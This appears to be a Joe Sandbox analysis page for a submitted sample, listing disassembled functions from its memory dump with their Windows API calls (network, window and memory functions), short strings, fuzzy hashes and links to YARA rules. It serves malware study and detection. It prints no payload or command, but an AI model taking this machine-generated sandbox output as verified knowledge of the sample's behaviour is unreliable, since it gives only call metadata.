Function 00E6AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00E1FC86: _wcscpy.LIBCMT ref: 00E1FCA9

Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC

__wcsnicmp.LIBCMT ref: 00E6B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E6B0F6

Strings

LPT, xrefs: 00E6B027

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 795cd1c2ddf604a36f4845eed7a16a4ce7f2944efff541cbe4c9614912dd80b2
Instruction ID: 8990ac2fa5fa2906603f801b962b60d422634546d94adf333e516efe108822a0
Opcode Fuzzy Hash: 795cd1c2ddf604a36f4845eed7a16a4ce7f2944efff541cbe4c9614912dd80b2
Instruction Fuzzy Hash: 32616F75A40215EFCB14DF94D891EAEB7F8EB09350F109069F916FB292D770AE84CB90

Function 00E12957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00E12968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00E12981

Strings

@, xrefs: 00E12975

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 5df55f678c6009f7dddc415b6a8432d09837e902c7d547dbbb96d135270bd23a
Instruction ID: 407501e88f3aefc784990880112b07e6bc1bd2f87c96205e9551c590382e8fc5
Opcode Fuzzy Hash: 5df55f678c6009f7dddc415b6a8432d09837e902c7d547dbbb96d135270bd23a
Instruction Fuzzy Hash: 235157B14087449BD320EF14DC86BAFBBE8FB85340F41885DF2D8611A6DB709569CB66

Function 00E69734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00E04F0B: __fread_nolock.LIBCMT ref: 00E04F29

_wcscmp.LIBCMT ref: 00E69824
_wcscmp.LIBCMT ref: 00E69837

Strings

FILE, xrefs: 00E69770

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 3cc3a508ccd473c5a5aac2516307af48af5657d2e8ee71758264e7b9cf795703
Instruction ID: a0d10f19a8a61fd74b863140fa4785382d7f1b46b80ad2e648ea1e221b63838c
Opcode Fuzzy Hash: 3cc3a508ccd473c5a5aac2516307af48af5657d2e8ee71758264e7b9cf795703
Instruction Fuzzy Hash: D341F571A4020ABADF219AE4DC45FEFB7FDEF85714F001069FA04B71C1DA71A9048B60

Function 00E40574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00E4057F

Strings

Dd, xrefs: 00E0A151
Dd, xrefs: 00E0A317

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ClearVariant
String ID: Dd$Dd
API String ID: 1473721057-2413357308
Opcode ID: 9985955ffd60aab614323bc827ce654a733099095d67faf2437adbe7930a3b8e
Instruction ID: 98f4fe4484eeaada1015fd613020888344f9b5609f23f45f15bb24fc9dcd55a4
Opcode Fuzzy Hash: 9985955ffd60aab614323bc827ce654a733099095d67faf2437adbe7930a3b8e
Instruction Fuzzy Hash: D65114B86053058FD754DF19C580A1ABBF1BB99344F58A82DE985AB3A1D332E881CB42

Function 00E7258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E7259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E725D4

Strings

|, xrefs: 00E725A5

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: f0d6bacb707eceb0cea19495934bf240dfdb0aa476bc6aae1b1a5a39ad8e236c
Instruction ID: 4ae60f1ecb1cb680173edb11e42513063dff451418f13472d6e2eb7547bca492
Opcode Fuzzy Hash: f0d6bacb707eceb0cea19495934bf240dfdb0aa476bc6aae1b1a5a39ad8e236c
Instruction Fuzzy Hash: F1311871D00119ABCF11AFA0CC85EEEBFB8FF08350F14605AF958B6162DB315995DB60

Function 00E87A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00E87B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E87B76

Strings

', xrefs: 00E87ACA

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 1a46a5b7f08530d8a2e0b50c2abdcfc92cc5d23f434a998f89f5889858145548
Instruction ID: 9cd9d2c6ae5532dd16ffbf527b82943ec0101fef6a3edbe95d010fc855a63d13
Opcode Fuzzy Hash: 1a46a5b7f08530d8a2e0b50c2abdcfc92cc5d23f434a998f89f5889858145548
Instruction Fuzzy Hash: 3B412875A042099FDB14DF65C981BEABBF6FB08304F20116AED48AB391D771A981CF90

Function 00E86A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00E86B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E86B53

Strings

static, xrefs: 00E86AB3

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: db36754a3de1474a1bfbb12096331d8f452f666e9fbe0a29cde26792dc642115
Instruction ID: 965c3404510346a29143eb16ed21cdc4f9d8554db2cc7181347142f1930a5d82
Opcode Fuzzy Hash: db36754a3de1474a1bfbb12096331d8f452f666e9fbe0a29cde26792dc642115
Instruction Fuzzy Hash: AF318F71100604AEDB10AF64CC41AFB73B9FF48764F10A619F9ADE7190DA31AC81C760

Function 00E628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E62911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E6294C

Strings

0, xrefs: 00E6290A

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 3e270de2b4990fe7e13422c0507850d6199a896f3b131afadf1d4811bd517d77
Instruction ID: 84d9335f2207b4b24094c2b7e7977875b7d2e3272d32e39208de8c8e6a744124
Opcode Fuzzy Hash: 3e270de2b4990fe7e13422c0507850d6199a896f3b131afadf1d4811bd517d77
Instruction Fuzzy Hash: 0E31D131A407059FEB28CF58EC45BAEBBF4EFC5394F18202DEA85B61A1DB709944CB11

Function 00E866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E86761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E8676C

Strings

Combobox, xrefs: 00E8672E

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: ce3de19ea77b79a8ac2be89ccd0f8b16ae1af44d1e7b00ae4e35555627f0fcf4
Instruction ID: e5eb7ae44ae576d24ec90b8583fe406c7086f071343510c47c8ecd6194d4e3ef
Opcode Fuzzy Hash: ce3de19ea77b79a8ac2be89ccd0f8b16ae1af44d1e7b00ae4e35555627f0fcf4
Instruction Fuzzy Hash: 53118675200208AFEF11AF54DC81EEB376AEB44368F105126F91CB7290D6729C5197A0

Function 00E86C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91

GetWindowRect.USER32(00000000,?), ref: 00E86C71
GetSysColor.USER32(00000012), ref: 00E86C8B

Strings

static, xrefs: 00E86C4E

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: b7e0a0f4d654e06562e058127508ca442940c83946b4a668a2afa6d1b077fb4d
Instruction ID: c1aa4562e6f000e87fc7f6ddba0a26369ea97d466838109d68e1cd283529ac94
Opcode Fuzzy Hash: b7e0a0f4d654e06562e058127508ca442940c83946b4a668a2afa6d1b077fb4d
Instruction Fuzzy Hash: 83212C72510209AFDF04DFA8CC45EEABBA8FB08315F005629F959E2250D635E851DB60

Function 00E86920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00E869A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E869B1

Strings

edit, xrefs: 00E86986

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 5a5c27403915c8c2d55a99c9e863e98d001e438d3a2ef931bbc6aee4ba17e4c1
Instruction ID: f057fb8d220e99098db4de24ff7fc9b3b5079735c6d7bfde8308f63d2fb046f7
Opcode Fuzzy Hash: 5a5c27403915c8c2d55a99c9e863e98d001e438d3a2ef931bbc6aee4ba17e4c1
Instruction Fuzzy Hash: 86116D71500204AFEB10AF64DC45AEB37A9EB45378F606724F9ADB61E0C631DC959760

Function 00E629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E62A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E62A41

Strings

0, xrefs: 00E62A18

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 00082fd1bc8465096d54c05152c8aecd9ae343292ca0a50e5b86dd55da7a2265
Instruction ID: 2f72abc3556dd9a7284edf67c9bed07d02ff02745feb41f66704e749af4455d3
Opcode Fuzzy Hash: 00082fd1bc8465096d54c05152c8aecd9ae343292ca0a50e5b86dd55da7a2265
Instruction Fuzzy Hash: 0E11E932941514AFCB35DFE8EC44FEA73B8AB85388F046029EA55F7251D7B0AD0AC791

Function 00E721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E7222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E72255

Strings

<local>, xrefs: 00E7221D

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 0d1e7dddab751e2e889bd812579ffbcb2579d789c4b1adbb6525778ad5dab29d
Instruction ID: ca90e63b138ee7dffdfefb17163083e18f19e5ebbd9e16a60337901c75cb0fd9
Opcode Fuzzy Hash: 0d1e7dddab751e2e889bd812579ffbcb2579d789c4b1adbb6525778ad5dab29d
Instruction Fuzzy Hash: 6711E070501265BADB248F129C84EFBFBA8FF0A355F10D22EFA18A6111E3709994D6F0

Function 00E1092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E03C14,00EC52F8,?,?,?), ref: 00E1096E

Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06

_wcscat.LIBCMT ref: 00E44CB7

Strings

S, xrefs: 00E109AE

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: S
API String ID: 257928180-3334745618
Opcode ID: 8a711e24c1eaa78e0a5b564b33c762b6d56ee3176d63c86e2204631b19cfdd0b
Instruction ID: b1269147658852f33123590b2f2a58bbbc45f0ec07efe9ac501c101890c0e4ce
Opcode Fuzzy Hash: 8a711e24c1eaa78e0a5b564b33c762b6d56ee3176d63c86e2204631b19cfdd0b
Instruction Fuzzy Hash: 9411A531A05208AACB40FB64CD46FDDB7E8AF88350B0064A5B988F7185EAB0A7C44B11

Function 00E58E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E58E73

Strings

ListBox, xrefs: 00E58E3D
ComboBox, xrefs: 00E58E12

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 4f877e4b802470e4241f59af6270ea9ba74e9b363a6e3123bcf9ae21406cd8f8
Instruction ID: 3c4fe7abe38ebcd4b507d5dbf10fda1a1e29675b0f0f1826cdaba2ae0e11ba1f
Opcode Fuzzy Hash: 4f877e4b802470e4241f59af6270ea9ba74e9b363a6e3123bcf9ae21406cd8f8
Instruction Fuzzy Hash: F301F571A01228AFCF14EBA0CC428FE73A8AF42360B142A19FC75772D2DE31580CC650

Function 00E58CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00E58D6B

Strings

ListBox, xrefs: 00E58D35
ComboBox, xrefs: 00E58D0A

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 175a925ec969f3b301517c1310ef6b4c34c4f0cf9a9e6055c3c4049384d46bc7
Instruction ID: 374e670bc5de88bdbe2cfe8df51d51d9c1d67cc5ed036715d26c7b0a3f203553
Opcode Fuzzy Hash: 175a925ec969f3b301517c1310ef6b4c34c4f0cf9a9e6055c3c4049384d46bc7
Instruction Fuzzy Hash: CD01B171A41208ABCF14EBA0CA52AFF73EC9F15341F142429B845772D2DE205A0CD761

Function 00E58D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00E58DEE

Strings

ListBox, xrefs: 00E58DBA
ComboBox, xrefs: 00E58D8F

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 96c1df988caaaadc7f3d6431efe746fb9c01b744eecb91ba7467b97b1fef8569
Instruction ID: 110195bbeac5cb6954a13ccd8e86686519f8f851284bbcaab580f698b98c94df
Opcode Fuzzy Hash: 96c1df988caaaadc7f3d6431efe746fb9c01b744eecb91ba7467b97b1fef8569
Instruction Fuzzy Hash: 9901F272A41208ABDF24EAA4CA42AFF73EC8F11341F142925BC45732D2DE215E0CD671

Function 00E5C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E5C534

Part of subcall function 00E5C816: _memmove.LIBCMT ref: 00E5C860
Part of subcall function 00E5C816: VariantInit.OLEAUT32(00000000), ref: 00E5C882
Part of subcall function 00E5C816: VariantCopy.OLEAUT32(00000000,?), ref: 00E5C88C

VariantClear.OLEAUT32(?), ref: 00E5C556

Strings

d}, xrefs: 00E5C517

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}
API String ID: 2932060187-1207350282
Opcode ID: ae4f61443e81dd44190c2ee31c5f32a42b7ecbfb998a1402a4bfd1737f7e0f92
Instruction ID: cfd26d724961a9d2fb45766088349f24f67ade75eb0c3e3886f43b592b0c1f0c
Opcode Fuzzy Hash: ae4f61443e81dd44190c2ee31c5f32a42b7ecbfb998a1402a4bfd1737f7e0f92
Instruction Fuzzy Hash: 171100719007089FC710DF9AD88489BF7F8FF08354B50852FE58AE7652E771AA48CB90

